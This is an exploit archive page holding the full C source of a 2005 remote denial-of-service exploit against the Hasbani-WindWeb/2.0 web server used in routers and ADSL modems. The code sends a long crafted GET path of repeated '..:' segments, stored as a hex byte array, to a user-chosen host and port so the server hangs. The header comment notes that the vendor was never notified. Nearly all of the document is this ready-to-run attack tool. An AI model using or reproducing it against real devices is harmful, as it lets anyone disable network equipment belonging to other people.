exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

XH-Hasbani-HTTPD-DoS.c

XH-Hasbani-HTTPD-DoS.c
Posted Oct 30, 2005
Authored by Expanders | Site x0n3-h4ck.org

Exploit for a remote denial of service flaw for HTTP GET in Hasbani-WindWeb version 2.0.

tags | exploit, remote, web, denial of service
SHA-256 | e7ea5226541a9e30177def6562f8d6efcb06aad03e47001f1f145555549dc8b9

XH-Hasbani-HTTPD-DoS.c

Change Mirror Download
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 26\09\05 \/ |__| \/ \/

[i] Title: Hasbani-WindWeb/2.0 - HTTP GET Remote DoS
[i] Discovered by: Expanders
[i] Exploit by: Expanders

[ What is Hasbani-WindWeb/2.0 ]

Hasbani server is a httpd created for menaging ethernet routers and adsl modems.

[ Why HTTPD crash? ]

Causes of DoS are not perfecly known by me 'cos i can't debug a chip-integrated http daemon.
Btw seems that Hasbani enter a loop in a GET /..:..:..etc. condition, causes that when an attacker reguest a long crafted string
server enter an endless loop with conseguenly crash of the httpd.

NOTE: This exploit DON'T drop down victim's adsl connection!

[ Timeline ]

This vulnerability was not comunicated because i did'n find Hasbani's vendor.

[ Links ]

www.x0n3-h4ck.org



*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define BUGSTR "GET %s HTTP/1.0\n\n\n" // Command where bug reside


char evilrequest[] = {
0x2f, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x78, 0x30, 0x6e, 0x33,
0x2d, 0x68, 0x34, 0x63, 0x6b, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e };

fd_set readfds;
int banner();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );

int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tHasbani-WindWeb/2.0 - HTTP GET Remote DoS\n");
printf("[i] Discovered by: \tExpanders\n");
printf("[i] Proof of concept by:\tExpanders\n\n");
return 0;
}

int usage(char *filename) {
printf("Usage: \t%s HOST <port> :: default HTTPD port: 80\n\n",filename);
exit(0);
}

int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;

memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!\n" );
exit(1);
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!\n" );
exit(1);
}
return ( s );
}


int main(int argc, char *argv[]) {
int s,n;
unsigned int rcv;
char *request;
char recvbuf[256];
banner();
if( argc < 3)
argv[2] = "80";
else if ((atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534))
usage(argv[0]);
if( (argc < 2) )
usage(argv[0]);
request = (char *) malloc(1024);
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
sleep(1);
printf("[+] Creating buffer\n");
sprintf(request,BUGSTR,evilrequest);
printf("[+] Sending %d bytes of painfull buffer\n",strlen(evilrequest));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
close(s);
exit(1);
}
sleep(1);
printf("[+] Done, Packet Sent\n");
close(s);
free(request);
request = NULL;
return 0;
}
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close